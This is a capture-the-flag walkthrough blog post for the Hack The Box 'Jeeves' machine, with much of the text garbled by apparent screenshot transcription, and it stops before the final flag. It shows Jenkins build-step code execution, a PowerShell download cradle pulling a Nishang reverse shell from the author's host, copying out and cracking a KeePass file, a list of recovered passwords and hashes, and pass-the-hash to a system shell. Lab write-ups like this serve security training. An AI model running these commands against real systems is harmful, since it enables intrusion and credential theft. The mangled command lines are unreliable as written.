Jeeves – No Metasploit

walkthroughs 2 Minutes

Fire up autorecon and run some scans… I did this while I went to http://10.10.10.63. It’s a good habit to just try port 80 while your scans are running so you’re not wasting time.

So when we go to the website and try searching, anything we do results in this:

Server Error in '/' Application. Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation standard Edition on Windows NT 5.0 (Build 2195: service Pack 4) ' to data type int. - 9.00.4053.00 (Intel X86) Description: An ocwrred during the of the web rewest. review the suck trace for information the error and o@inated wd e. Exception Details: System DataSqICIient-SØException: Cmversion füd when the nvarchar value 'Microsoft SQL Server 2Ø5 - 9.00-4053.00 X86) May 26 2009 Copyr•t (c) 19"-2005 Microwtt Corporation Edition on Windows NT 5.0 (Build 2195: Service 4) • to data type int. Error:

But weird thing is… it’s a fake image. So this is a dead end.

I waited a bit and got my scans back. Let’s look at nmap:

Nmap scan report for 10.10.10.63 Host is up, received user-set (ø.ø44s latency). scanned at 2020-05-27 16:17:20 EDT for 192s Not shown: 65531 filtered ports Reason: 65531 no-responses PORT 8Ø/tcp STATE SERVICE open http REASON VERSION syn-ack tt1 127 Microsoft IIS httpd 10.0 I http-methods: I supported Methods: OPTIONS TRACE GET HEAD POST Potentially risky methods: TRACE l_http-server-header: Microsoft-IIS/1ø.ø I _http-title: Ask Jeeves 135/tcp open msrpc syn-ack tt1 127 Microsoft Windows RPC 10 microsoft-ds (workgroup: WORKGROUP) 445/tcp open microsoft-ds syn-ack ttI 127 Microsoft Windows 7 - 5ØØØØ/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT l_http-server-header: Jetty(9.4.z-SNAPSHOT) I _http-title: Error Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008 (88%) OS CPE: cpe: /o:microsoft : r2 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: OPS(OI

Okay so there’s a port 50000 as well. I like to switch up the enumeration tools so this time I wanted to try using wfuzz. Running wfuzz on port 80 didn’t show anything new. However, on port 50000:

kalijhyd3 . —/TooIs/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ wfuzz -c -w /usr/share/wordlists/dirbus ter/directory-1ist-2.3-medium.txt - -hc http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing S SL sites. Check Wfuzz's documentation for more information. * Wfuzz 2.4.5 - The Web Fuzzer Target: http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ Total requests: 220560 ID øøøø41607 : 000048313 : Finishing Response 302 pending Lines 11 L Word 26 w Chars Ch 318 Ch Payload " askj eeves " "bt3" requests...

Alright… Let’s navigate to http://10.10.10.63:50000/askjeeves/

Jenkins Jenkins New Item People Build History Manage Jenkins Credentials Build Queue No builds in the queue. Build Executor Status 1 Idle 2 Idle log in AUTO REFRESH gadd description All s 0 Icon: w Name da nci n2020 Last Success 7 hr56 min - #10 7 hr28 min - #1 Last Failure 7 hr25 min - #16 WA RSS for all Last Duration 2.3 sec 2.6 sec RSS for failures RSS for iust latest builds

Interesting. I tried logging in with default creds and common lists, but nothing worked. I then just started poking around at the site to see what I could do without logging in.

Looks like we can create a project.

e Jenkins Jenkins Enter an item name pngmel Required field Freestyle project This is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for something other than software build. Pipeline Orchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and/or organizing complex activities that do not easily fit in free-style job type. Multi-configuration project Suitable for projects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc. Folder Creates a container that stores nested items in it Useful for grouping things together. Unlike view, which is just a filter, a folder creates a separate namespace, so you can have multiple things of the same name as long as they are in different folders. GitHub Organization Scans a GitHub organization (or user account) for all repositories matching some defined markers. Multibranch Pipeline Creates a set of Pipeline projects according to detected branches in one SCM repository. create a new item from other existing, you can use this option: Type to autocomplete log in

Now clicking around and scrolling down… we see something very interesting:

Jenkins pi ngme General Source Code Management Build Triggers Build Environment Build Post-build Actions Build periodically GitHub hook trigger for GITScm polling Poll SCM Build Environment Delete workspace before build starts Abort the build if it's stuck Add timestamps to the Console Output Use secret text(s) or file(s) With Ant Build Add build step Execute Windows batch command Execute shell Invoke Ant Invoke Gradle script Invoke top-level Maven targets Run with timeout Set build status to -pending" on GitHub commit Page generated: May 28, 2020 224-53 PM EDT REST API Jenkins ver. 2.87

This looks like a clear path to RCE. Let’s test it out:

Build Execute Windows batch command Command ping 1€.1€.14.3€ See the list of available environment variables Add build step Post-build Actions Add post-build action Apply Advancedm

After saving it, I had to figure out how to trigger it. The “build now” button seemed like a good candidate:

Build Now Delete Project Configure Build History find May 28, 2020 226 PM trend —

Running tcpdump on my box, I see the ICMP requests coming through:

kaliö)hyd3 . "Tools/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ sudo tcpdump -i tunø tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tunø, link-type RAW (Raw IP), capture size 262144 bytes IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags seq 984844400:984845062, ack 30 63434529, win 501, options [nop, nop,TS val 1480055907 ecr 40178073], length 662 •24.973560 IP 10.10.10.63.5øøøø > hyd3.5Ø664: Flags seq 1:206, ack 662, win 254, op 09:22. tions [nop, nop,TS val 40181743 ecr 1480055907], length 205 •24.973596 IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags [ . ] , ack 206, win 501, options [nop,n 09:22. val 1480055951 ecr 40181743], length op , TS •25 . 043798 IP 10.10.1Ø.63 > hyd3: ICMP echo request, id 1, seq 5, length 09:22. •25.043814 IP hyd3 > 10.1Ø.1Ø.63: ICMP echo reply, id 1, seq 5, length 09:22. •26.061409 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 6, length 09:22. •26. 061442 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 6, length 09:22. •26.312795 IP hyd3.5Ø661+ > 10.10.10.63.5øøøø: Flags [P.], seq 662:1331, ack 206, win 501, 09:22. options [nop, nop,TS val 1480057290 ecr 40181743], length 669 IP 10.10.1ø.63.5øøøø > hyd3.5Ø664: Flags [P.], seq 206:1161, ack 1331, win 252 , options [nop, nop,TS val 40183134 ecr 1480057290], length 955 IP hyd3.5Ø661+ > 10.10.1Ø.63.5ØØØØ: Flags nop,TS val 1480057342 ecr 40183134], length IP 10.10.10.63 > hyd3: IP hyd3 > 10.10.10.63: IP 10.10.10.63 > hyd3: IP hyd3 > 10.10.10.63: ICMP ICMP ICMP ICMP echo echo echo echo request, id reply, id 1, request, id reply, id 1, ack 1161, win 501, options [nop, 1, seq 7, length seq 7, length 1, seq 8, length seq 8, length

Now it’s as simple as creating a reverse powershell script with Nishang and appending the bottom with a callback to our box:

catch Write-warning "Something went wrong! Check if the server is reachable and you are usin g the correct port." Write-Error $_ 128, 63 Invoke-PowerSheIITcp -Reverse -IPAddress 10.10.14.30 -Port Bot

Serve up the PowerShell script:

kaliöhyd3 . "Documents/htb/jeeves$ python -m Serving HTTP on ø.ø.ø.ø port 8000 (http://ø. - [28/May/2Ø2Ø 09 : 36: 12] "GET 10.10.10.63 - http.server ø.ø.ø:8øøø/) . / Invoke-PowerShe11Tcp.ps1 HTTP/I.I" 200 -

Modify the build request:

Build Execute Windows batch command Command IEX(New-Object Net .WebClient) .downloadString( 'http://l€ . 16 . 14.36 : 8€0€/Invoke- PowerShellTcp . PSI See the list of available environment variables Add build s tep

Once you trigger it, you should receive a callback on your listener:

kaliö)hyd3 . —/Documents/htb/jeeves$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.63] 49688 Windows PowerSheII running as user kohsuke on JEEVES Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS C: j eeves\kohsuke PS C: hostname Jeeves

As a force of habit, I uploaded nc.exe and used it to get a binary shell as well

Some simple enumeration showed an interesting file: CEH.kdbx

Directory 05/28/2020 05/28/2020 09/18/2017 of C: 02:42 PM 02:42 PM 01:43 PM 2,846 CEH.kdbx

I tried copying the file with nc.exe but it was way too slow (if at all). I ended up using SMB:

kaliö)hyd3: "Documents/htb/jeeves/smb$ sudo python3 /usr/share/doc/python3-impacket/exampIes/sm bserver. py hyd3 /home/kaIi/Documents/htb/jeeves/smb Impacket vø.9.21 - Copyright 2020 SecureAuth Corporation Config file parsed Callback added for UUID 4B324FC8-167ø-01D3-1278-5A47BF6EE188 V:3.Ø Callback added for UUID 6BFFDø98-A112-361ø-9833-46C3F87E345A v:l.ø Config file parsed Config file parsed Config file parsed

Create the folder on the victim box and navigate to it:

Ips C. • New-PSDrive -Name 0.14. Name hyd3 "hyd3" -PSProvider "FileSystem" -Root 3Ø\hyd3" Used (GB) CurrentLocation Free (GB) Provider FileSystem Root

Copy the file over

Now looking at the file and running file on it, you know it’s a keypass file. Crack it with hashcat. In order to do this first you need to extract the hash with keepass2john:

kaliöhyd3 . —/Documents/htb/jeeves/smb$ /usr/sbin/keepass2john CEH.kdbx > ceh .hash kaliöhyd3 . —"Documents/htb/ jeeves/smb$ cat ceh . hash CEH : 3766b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fcff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b 68254db431a21ec33298b612fe647db48 kaliö)hyd3 . •-/Documents/htb/jeeves/smb$ vi ceh .hash

Locate the mode (-m) for hashcat for this hash format:

Hashcat is not expecting the CEH: file name before the hash, so edit that and then run hashcat with rockyou.txt

kaliöhyd3 . —/Documents/htb/jeeves/smb$ vi ceh .hash kaliöhyd3 . •-/Documents/htb/jeeves/smb$ cat ceh .hash b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b6825 4db431a21ec33298b612fe647db48
kaliöhyd3 . "Documents/htb/jeeves/smb$ hashcat txt ceh .hash hashcat (v5.1.ø) starting... OpenCL Platform #1: The pocu project -m 13400 -w 1 /usr/share/wordlists/rockyou . * Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, Counted lines in /usr/share/wordlists/rockyou . txt... Insufficient memory available Insufficient memory available Segmentation fault 4MCU

Whoops… This happened because I swapped the wordlist and the actual hash… so hashcat thought it was cracking a much larger file.

kalijhyd3 : "Documents/htb/jeeves/smb$ hashcat you . txt hashcat (v5.1.ø) starting... OpenCL Platform #1: The pocu project -m 13400 -a ceh .hash /usr/share/wordlists/rock * Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, øxøøøøffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt Minimum password length supported by kernel: Maximum password length supported by kernel: 256 Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled . * Device #1: build_opts ' -cm-std=CL1.2 -I OpenCL -I -D VENDOR ID-64 -D CUDA ARCH=ø -D AMD ROCM=ø -D -D DGST RI-I -D DGST R2=2 -D DGST R3=3 -D DGST ELEM=I+ -D KERN TYPE=134øø -D unroll ' * Device #1: Kernel m134øø-pure.ce8862df .kernel not 4MCU /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYP VECT SIZE-8 -D DEVICE TYPE-2 -D DGST RO=ø found in cache! Building may take a while.
b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØft66ØfCfft4f1CC89f728b6825 4db431a21ec33298b612fe647db48 : moonshinel Sesslon..... hashcat Status.... Cracked Hash . Type. KeePass 1 (AES/Twofish) and KeePass 2 (AES) Hash . Target.... Time Started Thu May 28 2020 (31 secs) Time. Estimated... : Thu May 28 2020 (0 secs) File (/usr/share/wordlists/rockyou . txt) Guess .Base.......: 1/1 (løø.øø%) Guess .Queue...... Speed Recovered........ Progress.......... Rejected... Restore.point....: Restore. Sub .#1...: Candidates .#1.... Started: Thu May Stopped: Thu May . .47db48 1760 H/s (12.21ms) Accel:512 Loops:64 Thr:l vec:8 1/1 (løø.øø%) Digests, 1/1 (løø.øø%) Salts 55296/14344385 (0.39%) 0/55296 (ø.øø%) 53248/14344385 (0.37%) Salt:Ø Amplifier: 0-1 Iteration: 5952-6000 soydivina 28 28 grad2ø1ø 2020 2020

So we found that the password for the file is moonshine1

Looking through everything in the kdbx file, we find:

CEH.kdbx [read-only] Groups View Tools Help - KeePassX Database Entries CEH General Windows Network Internet a eMai1 Homebanking Backup stuff Bankof America p DC Recovery PW P EC-Counci1 It's a secret Jenkins admin Keys to the king... Walmart.com Username Michae1321 administrator hackerman123 admin admin bob anonymous URL https://www.bankofamerica.com https://www.eccouncil.org/progra... http://localhost:8180/secret.jsp http://localhost:8080 http://www.walmart.com

Taking note of all our credentials found

backups tuff : aad3b435b51404eeaad3b435b51404ee : eØfb1 fb85756c24235ff238cbe81 feøø Michae1321: 12345 administrator : SITjAtJHKsugh90C4VZ1 hackerman123 : pwndyouall ! admin : F7WhTrSFDKB6sxHU1 cun b0b: ICEUnYPjNf1uPZSzOySA anonymous : password

So I tried using smbexec with either of the administrator passwords with no luck… but I knew that first line is a hash, so I attempted to pass the hash… and returned a system shell

kaliö)hyd3 . •-/Documents/htb/ jeeves/smb$ pth-winexe -U administrator%aad3b435b51W4eeaad3b435b514 04ee: eøfb1fb85756c24235ff238cbe81feøø // 10.10.10.63 cmd . exe E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH. Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved . C: \Windows whoami jeeves\administrator C: \Windows hostname Jeeves

Grabbing the user and root flags:

C: Administrator cd Administrator C: Desktop cd Desktop C: \Users dir Volume in drive C has no label. Volume Serial Number is BE5ø-BIC9 Directory 11/08/2017 11/08/2017 12/24/2017 11/08/2017 of C: 10:05 AM 10:05 AM 03:51 AM 10:05 AM 2 File(s) 2 Dir(s) 36 hm. txt 797 Windows 10 Update Assistant.lnk 833 bytes 7 bytes free C: \Users cd 'cd' is not recognized as an internal or external comand, operable program or batch file. C: hm. txt type hm.txt The flag is elsewhere. Look deeper.

What? Deeper?

Ok, maybe an alternate data stream… I found an online tutorial using streams.exe but it didn’t want to work for me, so I found a PowerShell alternative:

Published by hyd3sec

Published

Leave a comment